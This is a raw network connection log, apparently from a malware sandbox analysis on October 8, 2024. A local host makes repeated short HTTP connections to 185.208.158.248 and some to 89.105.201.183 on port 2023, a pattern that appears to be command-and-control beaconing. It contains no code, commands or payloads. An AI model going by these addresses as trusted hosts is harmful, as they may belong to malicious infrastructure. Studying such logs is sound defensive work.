                                                                              Oct 8, 2024 04:14:05.837853909 CEST8063175185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:06.545501947 CEST8063175185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:06.546534061 CEST6317580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:06.670819998 CEST6317580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:06.671133995 CEST6317680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:06.676410913 CEST8063175185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:06.676446915 CEST8063176185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:06.676502943 CEST6317580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:06.676544905 CEST6317680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:06.676677942 CEST6317680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:06.681442022 CEST8063176185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:07.381748915 CEST8063176185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:07.381968975 CEST6317680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:07.499021053 CEST6317680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:07.499345064 CEST6317780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:07.504234076 CEST8063177185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:07.504333973 CEST6317780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:07.504508972 CEST6317780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:07.504612923 CEST8063176185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:07.504672050 CEST6317680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:07.509279013 CEST8063177185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:08.201971054 CEST8063177185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:08.204252005 CEST6317780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:08.327157021 CEST6317780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:08.327483892 CEST6317880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:08.332433939 CEST8063178185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:08.332501888 CEST8063177185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:08.332633018 CEST6317880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:08.332633018 CEST6317780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:08.332726955 CEST6317880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:08.337615967 CEST8063178185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:09.014743090 CEST8063178185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:09.014941931 CEST6317880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:09.124156952 CEST6317880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:09.129061937 CEST8063178185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:09.364315987 CEST8063178185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:09.364553928 CEST6317880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:09.483256102 CEST6317880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:09.483546019 CEST6317980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:09.488483906 CEST8063178185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:09.488498926 CEST8063179185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:09.488574028 CEST6317880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:09.488590956 CEST6317980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:09.488717079 CEST6317980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:09.493630886 CEST8063179185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:10.181592941 CEST8063179185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:10.181754112 CEST6317980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:10.295753002 CEST6317980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:10.296021938 CEST6318080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:10.300946951 CEST8063180185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:10.301021099 CEST6318080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:10.301134109 CEST6318080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:10.301325083 CEST8063179185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:10.301390886 CEST6317980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:10.305963993 CEST8063180185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:10.981443882 CEST8063180185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:10.981525898 CEST6318080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:11.092614889 CEST6318080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:11.097558975 CEST8063180185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:11.334624052 CEST8063180185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:11.334753990 CEST6318080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:11.451908112 CEST6318080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:11.452204943 CEST6318180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:11.457107067 CEST8063180185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:11.457169056 CEST8063181185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:11.457180023 CEST6318080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:11.457354069 CEST6318180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:11.457354069 CEST6318180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:11.462246895 CEST8063181185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:12.144870996 CEST8063181185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:12.145047903 CEST6318180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:12.264466047 CEST6318180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:12.264750004 CEST6318280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:12.426917076 CEST8063182185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:12.427032948 CEST8063181185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:12.427159071 CEST6318280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:12.427294016 CEST6318180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:12.427371025 CEST6318280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:12.432164907 CEST8063182185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:13.116638899 CEST8063182185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:13.116894960 CEST6318280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:13.234890938 CEST6318280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:13.235275984 CEST6318380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:13.240151882 CEST8063183185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:13.240221977 CEST8063182185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:13.240381956 CEST6318280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:13.240400076 CEST6318380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:13.240716934 CEST6318380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:13.245471954 CEST8063183185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:13.930902004 CEST8063183185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:13.930977106 CEST6318380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.047321081 CEST6318380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.047751904 CEST6318480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.052700996 CEST8063184185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:14.052777052 CEST8063183185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:14.052843094 CEST6318480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.052890062 CEST6318380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.053086996 CEST6318480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.058008909 CEST8063184185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:14.736906052 CEST8063184185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:14.737107992 CEST6318480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.859714031 CEST6318480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.860017061 CEST6318580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.864918947 CEST8063185185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:14.865047932 CEST8063184185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:14.865104914 CEST6318480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.865211964 CEST6318580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.865211964 CEST6318580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:14.870053053 CEST8063185185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:15.553134918 CEST8063185185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:15.553261995 CEST6318580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:15.672518015 CEST6318580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:15.673041105 CEST6318680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:15.677875042 CEST8063185185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:15.677948952 CEST8063186185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:15.677973032 CEST6318580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:15.678050041 CEST6318680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:15.678229094 CEST6318680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:15.682997942 CEST8063186185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:16.375803947 CEST8063186185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:16.375905037 CEST6318680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:16.483433008 CEST6318680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:16.483874083 CEST6318780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:16.489686966 CEST8063187185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:16.489820957 CEST6318780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:16.489907026 CEST8063186185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:16.489976883 CEST6318680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:16.490117073 CEST6318780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:16.496274948 CEST8063187185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:17.180108070 CEST8063187185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:17.180272102 CEST6318780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:17.297525883 CEST6318780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:17.297947884 CEST6318880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:17.302915096 CEST8063188185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:17.302994967 CEST8063187185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:17.303024054 CEST6318880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:17.303070068 CEST6318780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:17.303303957 CEST6318880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:17.308114052 CEST8063188185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:18.026937962 CEST8063188185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:18.027086020 CEST6318880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:18.144979954 CEST6318880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:18.145396948 CEST6318980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:18.150373936 CEST8063189185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:18.150393963 CEST8063188185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:18.150511026 CEST6318880192.168.2.6185.208.158.248
Timestamp                            Src Port  Dst Port  Source IP        Dest IP
Oct 8, 2024 04:14:18.150599957 CEST     63189        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:18.153985023 CEST     63189        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:18.158854961 CEST        80     63189  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:18.857757092 CEST        80     63189  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:18.857959032 CEST     63189        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:18.968265057 CEST     63189        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:18.973472118 CEST        80     63189  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:19.213002920 CEST        80     63189  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:19.213242054 CEST     63189        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:19.328573942 CEST     63189        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:19.328979969 CEST     63190        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:19.333949089 CEST        80     63190  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:19.334014893 CEST        80     63189  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:19.334134102 CEST     63190        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:19.334134102 CEST     63189        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:19.334182978 CEST     63190        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:19.339246035 CEST        80     63190  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:20.022819042 CEST        80     63190  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:20.022954941 CEST     63190        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.139676094 CEST     63190        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.139910936 CEST     63191        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.144954920 CEST        80     63191  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:20.145052910 CEST     63191        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.145137072 CEST        80     63190  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:20.145245075 CEST     63191        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.145322084 CEST     63190        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.150182009 CEST        80     63191  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:20.838917017 CEST        80     63191  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:20.839054108 CEST     63191        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.952001095 CEST     63191        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.952347994 CEST     63192        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.957379103 CEST        80     63191  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:20.957420111 CEST        80     63192  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:20.957462072 CEST     63191        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.957535028 CEST     63192        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.957644939 CEST     63192        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:20.962487936 CEST        80     63192  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:21.653573990 CEST        80     63192  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:21.653769016 CEST     63192        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:21.765149117 CEST     63192        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:21.770275116 CEST        80     63192  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:22.002862930 CEST        80     63192  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:22.003079891 CEST     63192        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.123990059 CEST     63192        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.124193907 CEST     63193        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.129396915 CEST        80     63193  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:22.129513025 CEST     63193        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.129568100 CEST        80     63192  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:22.129745007 CEST     63193        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.129745007 CEST     63192        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.134736061 CEST        80     63193  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:22.835819006 CEST        80     63193  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:22.835901022 CEST     63193        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.951989889 CEST     63193        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.952389002 CEST     63194        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.958563089 CEST        80     63193  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:22.958605051 CEST        80     63194  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:22.958640099 CEST     63193        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.958679914 CEST     63194        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.958815098 CEST     63194        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:22.964397907 CEST        80     63194  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:23.144758940 CEST      2023     63162  89.105.201.183   192.168.2.6
Oct 8, 2024 04:14:23.147427082 CEST     63195        80  192.168.2.6      31.214.157.226
Oct 8, 2024 04:14:23.152451992 CEST        80     63195  31.214.157.226   192.168.2.6
Oct 8, 2024 04:14:23.152647972 CEST     63195        80  192.168.2.6      31.214.157.226
Oct 8, 2024 04:14:23.152875900 CEST     63196      2023  192.168.2.6      89.105.201.183
Oct 8, 2024 04:14:23.157763958 CEST      2023     63196  89.105.201.183   192.168.2.6
Oct 8, 2024 04:14:23.157937050 CEST     63196      2023  192.168.2.6      89.105.201.183
Oct 8, 2024 04:14:23.157938004 CEST     63196      2023  192.168.2.6      89.105.201.183
Oct 8, 2024 04:14:23.162914991 CEST      2023     63196  89.105.201.183   192.168.2.6
Oct 8, 2024 04:14:23.163106918 CEST     63196      2023  192.168.2.6      89.105.201.183
Oct 8, 2024 04:14:23.168018103 CEST      2023     63196  89.105.201.183   192.168.2.6
Oct 8, 2024 04:14:23.199709892 CEST     63162      2023  192.168.2.6      89.105.201.183
Oct 8, 2024 04:14:23.662949085 CEST        80     63194  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:23.663045883 CEST     63194        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:23.779603958 CEST      2023     63196  89.105.201.183   192.168.2.6
Oct 8, 2024 04:14:23.779891968 CEST     63195        80  192.168.2.6      31.214.157.226
Oct 8, 2024 04:14:23.780059099 CEST     63194        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:23.780522108 CEST     63197        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:23.784913063 CEST        80     63195  31.214.157.226   192.168.2.6
Oct 8, 2024 04:14:23.785231113 CEST        80     63194  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:23.785283089 CEST     63194        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:23.785434008 CEST        80     63197  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:23.785514116 CEST     63197        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:23.785619020 CEST     63197        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:23.790518999 CEST        80     63197  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:23.824748039 CEST     63196      2023  192.168.2.6      89.105.201.183
Oct 8, 2024 04:14:23.952656984 CEST        80     63195  31.214.157.226   192.168.2.6
Oct 8, 2024 04:14:23.953090906 CEST     63196      2023  192.168.2.6      89.105.201.183
Oct 8, 2024 04:14:23.958034039 CEST      2023     63196  89.105.201.183   192.168.2.6
Oct 8, 2024 04:14:23.996447086 CEST     63195        80  192.168.2.6      31.214.157.226
Oct 8, 2024 04:14:24.142493010 CEST      2023     63196  89.105.201.183   192.168.2.6
Oct 8, 2024 04:14:24.142721891 CEST     63196      2023  192.168.2.6      89.105.201.183
Oct 8, 2024 04:14:24.142721891 CEST     63196      2023  192.168.2.6      89.105.201.183
Oct 8, 2024 04:14:24.142786980 CEST     63195        80  192.168.2.6      31.214.157.226
Oct 8, 2024 04:14:24.147900105 CEST      2023     63196  89.105.201.183   192.168.2.6
Oct 8, 2024 04:14:24.148164034 CEST        80     63195  31.214.157.226   192.168.2.6
Oct 8, 2024 04:14:24.148307085 CEST     63195        80  192.168.2.6      31.214.157.226
Oct 8, 2024 04:14:24.481862068 CEST        80     63197  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:24.482027054 CEST     63197        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:24.593991995 CEST     63197        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:24.599117994 CEST        80     63197  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:24.831043005 CEST        80     63197  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:24.831302881 CEST     63197        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:24.952059984 CEST     63197        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:24.952471018 CEST     63198        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:24.957612038 CEST        80     63198  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:24.957705975 CEST        80     63197  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:24.957707882 CEST     63198        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:24.957803011 CEST     63197        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:24.958009005 CEST     63198        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:24.963063955 CEST        80     63198  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:25.643193960 CEST        80     63198  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:25.643421888 CEST     63198        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:25.765363932 CEST     63198        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:25.765655041 CEST     63199        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:25.770701885 CEST        80     63199  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:25.770819902 CEST     63199        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:25.770982027 CEST     63199        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:25.773962021 CEST        80     63198  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:25.774034977 CEST     63198        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:25.775784016 CEST        80     63199  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:26.470535040 CEST        80     63199  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:26.470695019 CEST     63199        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:26.592396975 CEST     63199        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:26.592835903 CEST     63200        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:26.597827911 CEST        80     63200  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:26.597920895 CEST        80     63199  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:26.597919941 CEST     63200        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:26.597973108 CEST     63199        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:26.598190069 CEST     63200        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:26.603125095 CEST        80     63200  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:27.282284975 CEST        80     63200  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:27.282636881 CEST     63200        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:27.406815052 CEST     63200        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:27.407310963 CEST     63201        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:27.412302971 CEST        80     63201  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:27.412343025 CEST        80     63200  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:27.412390947 CEST     63201        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:27.412415028 CEST     63200        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:27.412652969 CEST     63201        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:27.417439938 CEST        80     63201  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:28.101905107 CEST        80     63201  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:28.102266073 CEST     63201        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:28.381438971 CEST     63201        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:28.381622076 CEST     63202        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:28.510514975 CEST        80     63202  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:28.510648012 CEST        80     63201  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:28.510729074 CEST     63202        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:28.510730028 CEST     63201        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:28.510845900 CEST     63202        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:28.515671968 CEST        80     63202  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:29.223992109 CEST        80     63202  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:29.224417925 CEST     63202        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:29.342267990 CEST     63202        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:29.342571020 CEST     63203        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:29.347625017 CEST        80     63203  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:29.348284960 CEST     63203        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:29.348284960 CEST     63203        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:29.349107027 CEST        80     63202  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:29.350749969 CEST     63202        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:29.353315115 CEST        80     63203  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:30.061321974 CEST        80     63203  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:30.061625004 CEST     63203        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:30.171807051 CEST     63203        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:30.177086115 CEST        80     63203  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:30.417841911 CEST        80     63203  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:30.418068886 CEST     63203        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:30.542444944 CEST     63203        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:30.542877913 CEST     63204        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:30.548316002 CEST        80     63204  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:30.548547983 CEST     63204        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:30.548620939 CEST        80     63203  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:30.548796892 CEST     63203        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:30.548974991 CEST     63204        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:30.554958105 CEST        80     63204  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:31.234381914 CEST        80     63204  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:31.234585047 CEST     63204        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:31.343579054 CEST     63204        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:31.348845005 CEST        80     63204  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:31.579183102 CEST        80     63204  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:31.579464912 CEST     63204        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:31.701843023 CEST     63204        80  192.168.2.6      185.208.158.248
